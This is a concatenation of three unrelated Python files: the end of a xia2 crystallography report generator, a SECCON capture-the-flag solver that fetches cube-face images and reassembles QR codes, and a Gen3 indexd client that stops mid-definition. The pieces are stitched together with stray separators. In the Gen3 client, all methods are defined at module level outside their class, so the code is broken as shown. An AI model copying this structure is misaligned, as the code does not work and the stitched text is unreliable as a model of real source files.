        print('Estimated d_min for CHEF analysis: %.2f' % d_min)
        sel = flex.bool(intensities.size(), True)
        d_spacings = intensities.d_spacings().data()
        sel &= d_spacings >= d_min
        intensities = intensities.select(sel)
        batches = batches.select(sel)
        if dose is not None:
            dose = dose.select(sel)
    if dose is None:
        # No DOSE column: derive a dose per observation from batch numbers
        dose = PyChef.batches_to_dose(batches.data(), self.params.dose)
    else:
        dose = dose.data()
    pychef_stats = PyChef.Statistics(intensities, dose, n_bins=n_bins)
    return pychef_stats.to_dict()
def d_star_sq_to_d_ticks(d_star_sq, nticks):
    """
    Generate tick positions/labels for an axis in units of d*^2.

    Returns (tickvals, ticktext): *nticks* evenly spaced positions across
    the range of *d_star_sq*, each labelled with the corresponding d
    spacing (Å) to two decimals.

    (Removed a dead, unused `d_spacings = uctbx.d_star_sq_as_d(...)`
    computation present in the original.)
    """
    from cctbx import uctbx
    min_d_star_sq = min(d_star_sq)
    dstep = (max(d_star_sq) - min_d_star_sq)/nticks
    tickvals = list(min_d_star_sq + (i*dstep) for i in range(nticks))
    ticktext = ['%.2f' %(uctbx.d_star_sq_as_d(dsq)) for dsq in tickvals]
    return tickvals, ticktext
# Command-line parameter definitions for the report; pulls in the shared
# analysis options from xia2.Modules.Analysis via the include scope.
phil_scope = iotbx.phil.parse('''\
title = 'xia2 report'
.type = str
prefix = 'xia2'
.type = str
log_include = None
.type = path
include scope xia2.Modules.Analysis.phil_scope
''', process_includes=True)
def run(args):
    """Generate an HTML report (plus a JSON data dump) for an unmerged
    MTZ file.

    args -- command-line arguments: the first positional argument is the
    unmerged MTZ file path; the remainder are phil parameter assignments.
    """
    from xia2.XIA2Version import Version
    interp = phil_scope.command_line_argument_interpreter()
    params, unhandled = interp.process_and_fetch(
        args, custom_processor='collect_remaining')
    params = params.extract()
    args = unhandled

    unmerged_mtz = args[0]
    report = xia2_report(unmerged_mtz, params, base_dir='.')

    overall_stats_table = report.overall_statistics_table()
    merging_stats_table = report.merging_statistics_table()
    # NOTE(review): symmetry_table_html is computed but never passed to the
    # template below -- confirm whether it should be.
    symmetry_table_html = report.symmetry_table_html()

    # xtriage
    xtriage_success, xtriage_warnings, xtriage_danger = None, None, None
    if params.xtriage_analysis:
        xtriage_success, xtriage_warnings, xtriage_danger = report.xtriage_report()

    json_data = {}
    json_data.update(report.multiplicity_vs_resolution_plot())
    json_data.update(report.multiplicity_histogram())
    json_data.update(report.completeness_plot())
    json_data.update(report.scale_rmerge_vs_batch_plot())
    json_data.update(report.cc_one_half_plot())
    json_data.update(report.i_over_sig_i_plot())
    json_data.update(report.i_over_sig_i_vs_batch_plot())
    json_data.update(report.second_moments_plot())
    json_data.update(report.cumulative_intensity_distribution_plot())
    json_data.update(report.l_test_plot())
    json_data.update(report.wilson_plot())
    json_data.update(report.pychef_plots())

    resolution_graphs = OrderedDict(
        (k, json_data[k]) for k in
        ('cc_one_half', 'i_over_sig_i', 'second_moments', 'wilson_intensity_plot',
         'completeness', 'multiplicity_vs_resolution') if k in json_data)

    if params.include_radiation_damage:
        batch_graphs = OrderedDict(
            (k, json_data[k]) for k in
            ('scale_rmerge_vs_batch', 'i_over_sig_i_vs_batch', 'completeness_vs_dose',
             'rcp_vs_dose', 'scp_vs_dose', 'rd_vs_batch_difference'))
    else:
        batch_graphs = OrderedDict(
            (k, json_data[k]) for k in
            ('scale_rmerge_vs_batch', 'i_over_sig_i_vs_batch'))

    misc_graphs = OrderedDict(
        (k, json_data[k]) for k in
        ('cumulative_intensity_distribution', 'l_test', 'multiplicities') if k in json_data)

    # dict.iteritems() is Python-2-only; items() behaves identically here
    # and also works on Python 3.
    for k, v in report.multiplicity_plots().items():
        misc_graphs[k] = {'img': v}

    styles = {}
    for axis in ('h', 'k', 'l'):
        styles['multiplicity_%s' % axis] = 'square-plot'

    from jinja2 import Environment, ChoiceLoader, PackageLoader
    loader = ChoiceLoader([PackageLoader('xia2', 'templates'),
                           PackageLoader('dials', 'templates')])
    env = Environment(loader=loader)

    if params.log_include:
        log_text = open(params.log_include).read()
    else:
        log_text = ''

    template = env.get_template('report.html')
    html = template.render(page_title=params.title,
                           filename=os.path.abspath(unmerged_mtz),
                           space_group=report.intensities.space_group_info().symbol_and_number(),
                           unit_cell=str(report.intensities.unit_cell()),
                           mtz_history=[h.strip() for h in report.mtz_object.history()],
                           xtriage_success=xtriage_success,
                           xtriage_warnings=xtriage_warnings,
                           xtriage_danger=xtriage_danger,
                           overall_stats_table=overall_stats_table,
                           merging_stats_table=merging_stats_table,
                           cc_half_significance_level=params.cc_half_significance_level,
                           resolution_graphs=resolution_graphs,
                           batch_graphs=batch_graphs,
                           misc_graphs=misc_graphs,
                           styles=styles,
                           xia2_version=Version,
                           log_text=log_text,
                           )

    # json.dump writes text, so the file must be opened in text mode
    # (the previous 'wb' mode fails on Python 3).
    with open('%s-report.json' % params.prefix, 'w') as f:
        json.dump(json_data, f)

    # The HTML is explicitly encoded to ASCII bytes, so binary mode is
    # correct here on both Python 2 and 3.
    with open('%s-report.html' % params.prefix, 'wb') as f:
        f.write(html.encode('ascii', 'xmlcharrefreplace'))
# Script entry point: forward all command-line arguments to run().
if __name__ == '__main__':
    import sys
    run(sys.argv[1:])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cv2
import sys
import os
import numpy
import collections
import subprocess
from enum import IntEnum, auto
from pyzbar.pyzbar import decode
from PIL import Image
# Cube face colours, in OpenCV's BGR channel order.
YELLOW = [ 0, 213, 255]
BLUE = [186, 81, 0]
GREEN = [ 96, 158, 0]
ORANGE = [ 0, 88, 255]
RED = [ 58, 30, 196]
WHITE = [255, 255, 255]
# One QR code is reassembled per colour.
colors = [YELLOW, BLUE, GREEN, ORANGE, RED, WHITE]
def contains_color(img, bgr):
    """Return True if any pixel of `img` exactly equals the colour `bgr`.

    Vectorized with numpy instead of the previous per-pixel Python double
    loop (O(rows*cols) interpreter iterations).
    """
    target = numpy.asarray(bgr)
    if img.shape[-1] != target.shape[0]:
        # Mismatched channel counts (e.g. BGRA image vs BGR colour) could
        # never compare equal element-wise in the original loop either.
        return False
    return bool((img == target).all(axis=-1).any())
class Pos(IntEnum):
    """Position of a puzzle piece within the 3x3 grid of one QR face."""
    CENTER = 0
    TOP = 1
    RIGHT = 2
    BTM = 3
    LEFT = 4
    TOP_LEFT = 5
    TOP_RIGHT = 6
    BTM_RIGHT = 7
    BTM_LEFT = 8

    def is_corner(self):
        """True for the four corner positions."""
        return self in (Pos.TOP_LEFT, Pos.TOP_RIGHT, Pos.BTM_LEFT, Pos.BTM_RIGHT)

    def is_edge(self):
        """True for the four non-corner edge positions."""
        return self in (Pos.TOP, Pos.BTM, Pos.LEFT, Pos.RIGHT)
def get_top(img):
    # Top edge: the first pixel row.
    return img[0]
def get_bottom(img):
    # Bottom edge: the last pixel row.
    return img[-1]
def get_left(img):
    """Return the left edge (first pixel column) of the image.

    Bug fix: this previously returned column 1 rather than column 0,
    inconsistent with get_top/get_bottom/get_right, which all return the
    outermost row/column.
    """
    return img[:, 0]
def get_right(img):
    # Right edge: the last pixel column.
    return img[:, -1]
class Matcher:
    """Decides how two puzzle pieces fit together, using a known
    background colour that marks the outer border of the full QR code."""

    def __init__(self, bg_color):
        self.bg_color = bg_color

    def check_next(self, img1, img2):
        """Return (side, rotated) when img2 (in some rotation) attaches to
        img1 at `side`, otherwise (None, None)."""
        pos1 = self.get_pos(img1)
        pos2 = self.get_pos(img2)
        # Two corner pieces, or two edge pieces, are never direct neighbours.
        if (pos1.is_corner() and pos2.is_corner()) or \
           (pos1.is_edge() and pos2.is_edge()):
            return (None, None)
        for side in (Pos.TOP, Pos.BTM, Pos.LEFT, Pos.RIGHT):
            matched, rotated = self.get_next_part(img1, img2, side)
            if matched:
                return (side, rotated)
        return (None, None)

    def get_pos(self, img):
        """Classify a piece by which of its borders are pure background."""
        rows, cols, _ = img.shape
        bg = self.bg_color
        top = (get_top(img) == bg).all()
        bottom = (get_bottom(img) == bg).all()
        left = (get_left(img) == bg).all()
        right = (get_right(img) == bg).all()
        # Corners first (two background borders), then edges, else centre.
        if top and left:
            return Pos.TOP_LEFT
        if top and right:
            return Pos.TOP_RIGHT
        if bottom and left:
            return Pos.BTM_LEFT
        if bottom and right:
            return Pos.BTM_RIGHT
        if top:
            return Pos.TOP
        if bottom:
            return Pos.BTM
        if left:
            return Pos.LEFT
        if right:
            return Pos.RIGHT
        return Pos.CENTER

    def get_next_part(self, img1, img2, pos):
        """Try all four rotations of img2 against side `pos` of img1."""
        edge_pairs = {
            Pos.TOP: (get_top, get_bottom),
            Pos.BTM: (get_bottom, get_top),
            Pos.LEFT: (get_left, get_right),
            Pos.RIGHT: (get_right, get_left),
        }
        if pos not in edge_pairs:
            return (False, None)
        my_edge, their_edge = edge_pairs[pos]
        for turns in range(4):
            rotated = numpy.rot90(img2, k=turns)
            if self.is_continuous(my_edge(img1), their_edge(rotated)):
                return (True, rotated)
        return (False, None)

    # edge1: 1xn
    # edge2: 1xn
    def is_continuous(self, edge1, edge2):
        """Edges match when pixel-identical and not pure background."""
        return (not (edge1 == self.bg_color).all()) and (edge1 == edge2).all()
def cat_parts(img1, img2, pos):
    """Concatenate img2 onto side `pos` of img1 and return the result.

    Bug fix: the body previously referenced the undefined name `rotated`
    (a leftover from the caller's scope) instead of the `img2` parameter,
    so any call raised NameError.
    """
    if pos == Pos.TOP:
        return cv2.vconcat([img2, img1])
    elif pos == Pos.BTM:
        return cv2.vconcat([img1, img2])
    elif pos == Pos.LEFT:
        return cv2.hconcat([img2, img1])
    elif pos == Pos.RIGHT:
        return cv2.hconcat([img1, img2])
def split_parts(png_files, color, part_size=82, grid=3):
    """Cut each PNG into a grid x grid array of square tiles and keep only
    the tiles containing `color`.

    part_size/grid default to the 82-pixel, 3x3 layout of the challenge
    images; they were previously hard-coded constants.
    """
    parts = []
    for png in png_files:
        img = cv2.imread(png, cv2.IMREAD_UNCHANGED)
        print("splitting {0}".format(png))
        for i in range(grid):
            for j in range(grid):
                tile = img[(part_size * i):(part_size * (i + 1)),
                           (part_size * j):(part_size * (j + 1))]
                if contains_color(tile, color):
                    # TODO: split png files just once and write them down
                    #cv2.imwrite("out-{0}x{1}-{2}".format(i, j, png), tile)
                    parts.append(tile)
    return parts
def rotate_corner(matcher, corner, pos):
    # Rotate a corner piece so that it sits at grid position `pos`.
    # The corner Pos values (5..8) are laid out clockwise, so the
    # difference between two corner positions is the number of quarter
    # turns between them; axes=(1, 0) makes numpy.rot90 rotate clockwise.
    # clock-wise rotation: axes=(1, 0)
    return numpy.rot90(corner, k=((pos - matcher.get_pos(corner))), axes=(1, 0))
def make_whole_image(qr_arr):
    """Stitch the 3x3 array of tiles back into a single image.

    Each qr_arr[i] is stacked vertically, then the three stacks are
    joined horizontally (the first index runs horizontally here).
    """
    stacks = [cv2.vconcat(list(column)) for column in qr_arr]
    return cv2.hconcat(stacks)
def concat_parts(parts, color):
    """Assemble the 9 tiles in `parts` into one full QR image for `color`.

    Strategy: anchor a corner piece at grid cell (0, 0), then repeatedly
    find a piece (in some rotation) whose edge continues the most recently
    placed piece; the centre tile is fitted last.
    """
    matcher = Matcher(color)
    # Pick any corner piece as the anchor and remove it from the pool.
    corner = None
    for i in range(len(parts)):
        if matcher.get_pos(parts[i]).is_corner():
            corner = parts.pop(i)
            break
    qr_arr = [[None, None, None], [None, None, None], [None, None, None]]
    qr_arr[0][0] = rotate_corner(matcher, corner, Pos.TOP_LEFT)
    target = (0, 0)
    while len(parts) > 1:
        for n in range(len(parts)):
            part = parts[n]
            (i, j) = target
            #print("n={0} len(parts)={1} target={2}".format(n, len(parts), target))
            pos, rotated = matcher.check_next(qr_arr[i][j], part)
            if pos == None:
                continue
            else:
                # Move the cursor to the grid cell the new piece occupies.
                if pos == Pos.TOP:
                    j -= 1
                elif pos == Pos.BTM:
                    j += 1
                elif pos == Pos.LEFT:
                    i -= 1
                elif pos == Pos.RIGHT:
                    i += 1
                # The centre cell is filled only at the very end, when a
                # single piece remains; skip candidates landing there now.
                if (1, 1) == (i, j):
                    continue
                parts.pop(n)
                qr_arr[i][j] = rotated
                #print("found:", (i, j))
                target = (i, j)
                break
    # The one remaining piece must be the centre; orient it against its
    # neighbour stored at qr_arr[0][1].
    _, rotated = matcher.check_next(qr_arr[0][1], parts[0])
    qr_arr[1][1] = rotated
    return make_whole_image(qr_arr)
def create_qr_image(png_files, color):
    """Split all face images and reassemble the QR code for `color`.

    Exits the process when the expected 9 tiles are not found.
    """
    parts = split_parts(png_files, color)
    if len(parts) != 9:
        print("[-] Failed to split")
        sys.exit(1)
    print("[+] Done!")
    return concat_parts(parts, color)
def get_qr_text(filename):
    """Decode the QR code in `filename` and return its text payload."""
    data = decode(Image.open(filename))
    # data[0] is the first detected symbol; field 0 is its raw byte
    # payload (pyzbar Decoded.data) -- TODO confirm against the pyzbar
    # version in use.
    return data[0][0].decode('utf-8', 'ignore')
def qubic_rube(dir, code):
    """Solve one challenge stage.

    Downloads the six cube-face images for `code` into directory `dir`,
    rebuilds each colour's QR code, and returns the code of the next
    stage (extracted from the URL payload). Prints the flag and exits
    when a SECCON{...} payload is found.
    """
    os.chdir(dir)
    # Fetch all six cube faces (previously six copy-pasted calls).
    for face in ("U", "R", "L", "F", "B", "D"):
        subprocess.call(
            ["wget",
             "http://qubicrube.pwn.seccon.jp:33654/images/"
             + code + "_" + face + ".png"])
    png_files = [path for path in os.listdir(".")
                 if os.path.splitext(path)[1] == '.png']
    for i, color in enumerate(colors):
        qr_img = create_qr_image(png_files, color)
        qr_filename = "qr-{0}.png".format(i)
        cv2.imwrite(qr_filename, qr_img)
        qr_text = get_qr_text(qr_filename)
        if qr_text.startswith("http://"):
            os.chdir("..")
            # Next stage's code is the last URL path component.
            return qr_text.split("/")[-1]
        if qr_text.startswith("SECCON{"):
            print("Flag is: " + qr_text)
            sys.exit(0)
if __name__ == '__main__':
    # Stage-1 code; later stage codes can be pasted in to resume a run.
    next_code = "01000000000000000000" # 1
    #next_code = "30468d9272ca9219655a" # 30
    #next_code = "3142aec6cd75d8596295" # 31
    # One directory per stage, 50 stages in total.
    for i in range(1, 51):
        os.mkdir(str(i))
        next_code = qubic_rube(str(i), next_code)
        #cv2.waitKey(0)
        #cv2.destroyAllWindows()
|
import aiohttp
import backoff
import requests
import urllib.parse
from cdislogging import get_logger
import sys
import indexclient.client as client
from gen3.utils import DEFAULT_BACKOFF_SETTINGS, raise_for_status_and_print_error
from gen3.auth import Gen3Auth
logging = get_logger("__name__")
class Gen3Index:
    """
    A class for interacting with the Gen3 Index services (indexd).

    Args:
        endpoint (str): public endpoint for reading/querying indexd - only necessary if auth_provider not provided
        auth_provider (Gen3Auth): A Gen3Auth class instance or indexd basic creds tuple
        service_location (str): relative path of the indexd service under the commons

    Examples:
        This generates the Gen3Index class pointed at the sandbox commons while
        using the credentials.json downloaded from the commons profile page.

        >>> auth = Gen3Auth(refresh_file="credentials.json")
        ... index = Gen3Index(auth)
    """
def __init__(self, endpoint=None, auth_provider=None, service_location="index"):
    """Initialise the indexd client.

    Args:
        endpoint (str): public indexd endpoint; may be omitted when a
            Gen3Auth instance is supplied (its endpoint is used instead).
        auth_provider: Gen3Auth instance or indexd basic-auth tuple.
        service_location (str): path of the indexd service relative to
            the commons root.
    """
    # legacy interface required endpoint as 1st arg
    if endpoint and isinstance(endpoint, Gen3Auth):
        auth_provider = endpoint
        endpoint = None
    if auth_provider and isinstance(auth_provider, Gen3Auth):
        endpoint = auth_provider.endpoint
    endpoint = endpoint.strip("/")
    # if running locally, indexd is deployed by itself without a location relative
    # to the commons
    if "http://localhost" in endpoint:
        service_location = ""
    if not endpoint.endswith(service_location):
        endpoint += "/" + service_location
    self.client = client.IndexClient(endpoint, auth=auth_provider)
### Get Requests
def is_healthy(self):
    """Return True when indexd's _status endpoint responds "Healthy"."""
    try:
        status_response = self.client._get("_status")
        status_response.raise_for_status()
    except Exception:
        # Any connection or HTTP error counts as unhealthy.
        return False
    else:
        return status_response.text == "Healthy"
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_version(self):
    """Return the version reported by indexd's _version endpoint."""
    version_response = self.client._get("_version")
    raise_for_status_and_print_error(version_response)
    return version_response.json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_stats(self):
    """Return basic info about the records in indexd (_stats endpoint)."""
    stats_response = self.client._get("_stats")
    raise_for_status_and_print_error(stats_response)
    return stats_response.json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_all_records(self, limit=None, paginate=False, start=None):
    """
    Get a list of all records.

    Args:
        limit (int): max number of records per request
        paginate (bool): follow did-based pagination to fetch every page
        start (str): did to start listing after. Bug fix: this parameter
            was previously accepted but silently ignored; it is now
            forwarded to the initial request.

    Returns:
        List[dict]: all indexd records fetched
    """
    all_records = []

    params = {}
    if limit:
        params["limit"] = limit
    if start:
        params["start"] = start
    url = "index/"
    if params:
        url += "?" + urllib.parse.urlencode(params)

    response = self.client._get(url)
    raise_for_status_and_print_error(response)

    # Guard against a missing/None "records" field in the response.
    records = response.json().get("records") or []
    all_records.extend(records)

    if paginate and records:
        previous_did = None
        start_did = records[-1].get("did")

        # Keep requesting pages starting after the last did seen, until a
        # page no longer advances the cursor.
        while start_did != previous_did:
            previous_did = start_did

            next_params = {"start": f"{start_did}"}
            url_parts = list(urllib.parse.urlparse(url))
            query = dict(urllib.parse.parse_qsl(url_parts[4]))
            query.update(next_params)
            url_parts[4] = urllib.parse.urlencode(query)
            url = urllib.parse.urlunparse(url_parts)

            response = self.client._get(url)
            raise_for_status_and_print_error(response)

            records = response.json().get("records") or []
            all_records.extend(records)

            if records:
                start_did = records[-1].get("did")

    return all_records
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_records_on_page(self, limit=None, page=None):
    """Return the records on one page of the index listing.

    Args:
        limit (int): page size
        page (int): page number
    """
    query_params = {
        key: value
        for key, value in (("limit", limit), ("page", page))
        if value is not None
    }
    full_url = "index/" + "?" + urllib.parse.urlencode(query_params)
    response = self.client._get(full_url)
    raise_for_status_and_print_error(response)
    return response.json().get("records")
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_get_record(self, guid=None, _ssl=None):
    """
    Asynchronous function to request a record from indexd.

    Args:
        guid (str): record guid
        _ssl (None, optional): whether or not to use ssl

    Returns:
        dict: indexd record
    """
    url = f"{self.client.url}/index/{guid}"
    async with aiohttp.ClientSession() as session:
        async with session.get(url, ssl=_ssl) as response:
            # NOTE(review): raise_for_status_and_print_error is shared
            # with the synchronous requests-based code paths -- confirm it
            # handles an aiohttp response object as well.
            raise_for_status_and_print_error(response)
            response = await response.json()
    return response
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_get_records_on_page(self, limit=None, page=None, _ssl=None):
    """
    Asynchronous function to request a page from indexd.

    Args:
        limit (int/str, optional): max number of records on the page
        page (int/str): indexd page to request
        _ssl (None, optional): whether or not to use ssl

    Returns:
        List[dict]: List of indexd records from the page
    """
    # (removed an unused `all_records` accumulator left over from a
    # copy/paste of the paging variant)
    params = {}
    if limit is not None:
        params["limit"] = limit
    if page is not None:
        params["page"] = page
    query = urllib.parse.urlencode(params)
    url = f"{self.client.url}/index" + "?" + query
    async with aiohttp.ClientSession() as session:
        async with session.get(url, ssl=_ssl) as response:
            payload = await response.json()
    return payload.get("records")
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_get_records_from_checksum(
    self, checksum, checksum_type="md5", _ssl=None
):
    """
    Asynchronous function to request records from indexd matching checksum.

    Args:
        checksum (str): indexd checksum to request
        checksum_type (str): type of checksum, defaults to md5
        _ssl (None, optional): whether or not to use ssl

    Returns:
        List[dict]: List of indexd records
    """
    # (removed an unused `all_records` accumulator left over from a
    # copy/paste of the paging variant)
    query = urllib.parse.urlencode({"hash": f"{checksum_type}:{checksum}"})
    url = f"{self.client.url}/index" + "?" + query
    async with aiohttp.ClientSession() as session:
        async with session.get(url, ssl=_ssl) as response:
            payload = await response.json()
    return payload.get("records")
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get(self, guid, dist_resolution=True):
    """
    Get the metadata associated with the given id, alias, or
    distributed identifier.

    Args:
        guid (str): record id
        dist_resolution (bool): *optional* whether to attempt distributed
            resolution
    """
    record = self.client.global_get(guid, dist_resolution)
    return record.to_json() if record else record
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_urls(self, size=None, hashes=None, guids=None):
    """
    Get a list of urls that match the query params.

    Args:
        size (int): object size
        hashes (str): hashes specified as algorithm:value
        guids (list): list of record ids
    """
    ids = ",".join(guids) if guids else guids
    params = {"size": size, "hash": hashes, "ids": ids}
    urls = self.client._get("urls", params=params).json()
    return list(urls.values())
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_record(self, guid):
    """Return the metadata dict for a given id (or the falsy client
    result when nothing was found)."""
    record = self.client.get(guid)
    return record.to_json() if record else record
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_record_doc(self, guid):
    """
    Get the indexclient Document object (not a plain dict) associated
    with a given id.
    """
    return self.client.get(guid)
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_with_params(self, params=None):
    """
    Return a document object corresponding to the supplied parameters, such
    as ``{'hashes': {'md5': '...'}, 'size': '...', 'metadata': {'file_state': '...'}}``.

    - need to include all the hashes in the request
    - index client like signpost or indexd will need to handle the
      query param `'hash': 'hash_type:hash'`
    """
    record = self.client.get_with_params(params)
    return record.to_json() if record else record
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_get_with_params(self, params, _ssl=None):
    """
    Return a document object corresponding to the supplied parameters.

    - need to include all the hashes in the request
    - need to handle the query param `'hash': 'hash_type:hash'`

    Args:
        params (dict): params to search with
        _ssl (None, optional): whether or not to use ssl

    Returns:
        Document: json representation of an entry in indexd
    """
    query_params = urllib.parse.urlencode(params)
    url = f"{self.client.url}/index/?{query_params}"
    async with aiohttp.ClientSession() as session:
        async with session.get(url, ssl=_ssl) as response:
            # Bug fix: aiohttp's raise_for_status() is a regular method
            # returning None; `await`-ing it raised "object NoneType can't
            # be used in 'await' expression" on every call.
            response.raise_for_status()
            record = await response.json()
    return record
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_latest_version(self, guid, has_version=False):
    """
    Get the metadata of the latest index record version associated
    with the given id.

    Args:
        guid (str): record id
        has_version (bool): *optional* exclude entries without a version
    """
    record = self.client.get_latest_version(guid, has_version)
    return record.to_json() if record else record
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_versions(self, guid):
    """
    Get the metadata of all index record versions associated with the
    given id.

    Args:
        guid (str): record id
    """
    response = self.client._get(f"/index/{guid}/versions")
    raise_for_status_and_print_error(response)
    return list(response.json().values())
### Post Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def create_record(
    self,
    hashes,
    size,
    did=None,
    urls=None,
    file_name=None,
    metadata=None,
    baseid=None,
    acl=None,
    urls_metadata=None,
    version=None,
    authz=None,
):
    """
    Create a new record and add it to the index

    Args:
        hashes (dict): {hash type: hash value,}
            eg ``hashes={'md5': ab167e49d25b488939b1ede42752458b'}``
        size (int): file size metadata associated with a given uuid
        did (str): provide a UUID for the new indexd to be made
        urls (list): list of URLs where you can download the UUID
        acl (list): access control list
        authz (str): RBAC string
        file_name (str): name of the file associated with a given UUID
        metadata (dict): additional key value metadata for this entry
        urls_metadata (dict): metadata attached to each url
        baseid (str): optional baseid to group with previous entries versions
        version (str): entry version string

    Returns:
        Document: json representation of an entry in indexd
    """
    # Arguments are forwarded positionally, so their order must match
    # indexclient's IndexClient.create signature exactly.
    rec = self.client.create(
        hashes,
        size,
        did,
        urls,
        file_name,
        metadata,
        baseid,
        acl,
        urls_metadata,
        version,
        authz,
    )
    return rec.to_json()
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
async def async_create_record(
    self,
    hashes,
    size,
    did=None,
    urls=None,
    file_name=None,
    metadata=None,
    baseid=None,
    acl=None,
    urls_metadata=None,
    version=None,
    authz=None,
    _ssl=None,
):
    """
    Asynchronous function to create a record in indexd.

    Args:
        hashes (dict): {hash type: hash value,}
            eg ``hashes={'md5': ab167e49d25b488939b1ede42752458b'}``
        size (int): file size metadata associated with a given uuid
        did (str): provide a UUID for the new indexd to be made
        urls (list): list of URLs where you can download the UUID
        acl (list): access control list
        authz (str): RBAC string
        file_name (str): name of the file associated with a given UUID
        metadata (dict): additional key value metadata for this entry
        urls_metadata (dict): metadata attached to each url
        baseid (str): optional baseid to group with previous entries versions
        version (str): entry version string
        _ssl (None, optional): whether or not to use ssl

    Returns:
        Document: json representation of an entry in indexd
    """
    async with aiohttp.ClientSession() as session:
        if urls is None:
            urls = []
        # NOTE: this local deliberately shadows the stdlib `json` module
        # name inside this function; it is the request payload.
        json = {
            "form": "object",
            "hashes": hashes,
            "size": size,
            "urls": urls or [],
        }

        # Only include optional fields that were actually supplied.
        if did:
            json["did"] = did
        if file_name:
            json["file_name"] = file_name
        if metadata:
            json["metadata"] = metadata
        if baseid:
            json["baseid"] = baseid
        if acl:
            json["acl"] = acl
        if urls_metadata:
            json["urls_metadata"] = urls_metadata
        if version:
            json["version"] = version
        if authz:
            json["authz"] = authz

        # aiohttp only allows basic auth with their built in auth, so we
        # need to manually add JWT auth header
        headers = {"Authorization": self.client.auth._get_auth_value()}

        async with session.post(
            f"{self.client.url}/index/",
            json=json,
            headers=headers,
            ssl=_ssl,
        ) as response:
            assert response.status == 200, await response.json()
            response = await response.json()
    return response
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def create_blank(self, uploader, file_name=None):
    """Create a blank record owned by `uploader`, optionally named.

    Args:
        uploader (str): uploader identity recorded on the blank record
        file_name (str): *optional* file name for the record
    """
    payload = {"uploader": uploader, "file_name": file_name}
    response = self.client._post(
        "index/blank",
        headers={"content-type": "application/json"},
        auth=self.client.auth,
        data=client.json_dumps(payload),
    )
    raise_for_status_and_print_error(response)
    return self.get_record(response.json()["did"])
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def create_new_version(
    self,
    guid,
    hashes,
    size,
    did=None,
    urls=None,
    file_name=None,
    metadata=None,
    acl=None,
    urls_metadata=None,
    version=None,
    authz=None,
):
    """
    Add new version for the document associated to the provided uuid

    Since data content is immutable, when you want to change the
    size or hash, a new index document with a new uuid needs to be
    created as its new version. That uuid is returned in the did
    field of the response. The old index document is not deleted.

    Args:
        guid: (string): record id
        hashes (dict): {hash type: hash value,}
            eg ``hashes={'md5': ab167e49d25b488939b1ede42752458b'}``
        size (int): file size metadata associated with a given uuid
        did (str): provide a UUID for the new indexd to be made
        urls (list): list of URLs where you can download the UUID
        file_name (str): name of the file associated with a given UUID
        metadata (dict): additional key value metadata for this entry
        acl (list): access control list
        urls_metadata (dict): metadata attached to each url
        version (str): entry version string
        authz (str): RBAC string

    body: json/dictionary format
        - Metadata object that needs to be added to the store.
          Providing size and at least one hash is necessary and
          sufficient. Note: it is a good idea to add a version
          number
    """
    if urls is None:
        urls = []
    # NOTE(review): unlike create_record, keys left as None are included
    # in the payload and sent as JSON null -- confirm indexd treats null
    # and absent fields identically here.
    json = {
        "urls": urls,
        "form": "object",
        "hashes": hashes,
        "size": size,
        "file_name": file_name,
        "metadata": metadata,
        "urls_metadata": urls_metadata,
        "acl": acl,
        "authz": authz,
        "version": version,
    }
    if did:
        json["did"] = did
    response = self.client._post(
        "index",
        guid,
        headers={"content-type": "application/json"},
        data=client.json_dumps(json),
        auth=self.client.auth,
    )
    raise_for_status_and_print_error(response)
    rec = response.json()
    if rec and "did" in rec:
        return self.get_record(rec["did"])

    return None
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def get_records(self, dids):
    """
    Get a list of documents given a list of dids.

    Args:
        dids (list): list of record ids

    Returns:
        list: json representing index records, or None when the bulk
        endpoint reports 404
    """
    try:
        response = self.client._post(
            "bulk/documents", json=dids, auth=self.client.auth
        )
    except requests.HTTPError as exception:
        if exception.response.status_code != 404:
            raise
        return None
    return response.json()
### Put Requests
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def update_blank(self, guid, rev, hashes, size, urls=None, authz=None):
    """
    Update only hashes and size for a blank index

    Args:
        guid (string): record id
        rev (string): data revision - simple consistency mechanism
        hashes (dict): {hash type: hash value,}
            eg ``hashes={'md5': ab167e49d25b488939b1ede42752458b'}``
        size (int): file size metadata associated with a given uuid
        urls (list): *optional* list of URLs where the data can be fetched
        authz (str): *optional* RBAC string

    Returns:
        dict: the updated indexd record
    """
    params = {"rev": rev}
    json = {"hashes": hashes, "size": size}
    # Optional fields are only sent when supplied.
    if urls:
        json["urls"] = urls
    if authz:
        json["authz"] = authz

    response = self.client._put(
        "index/blank",
        guid,
        headers={"content-type": "application/json"},
        params=params,
        auth=self.client.auth,
        data=client.json_dumps(json),
    )
    raise_for_status_and_print_error(response)
    rec = response.json()
    return self.get_record(rec["did"])
@backoff.on_exception(backoff.expo, Exception, **DEFAULT_BACKOFF_SETTINGS)
def update_record(
    self,
    guid,
    file_name=None,
    urls=None,
    version=None,
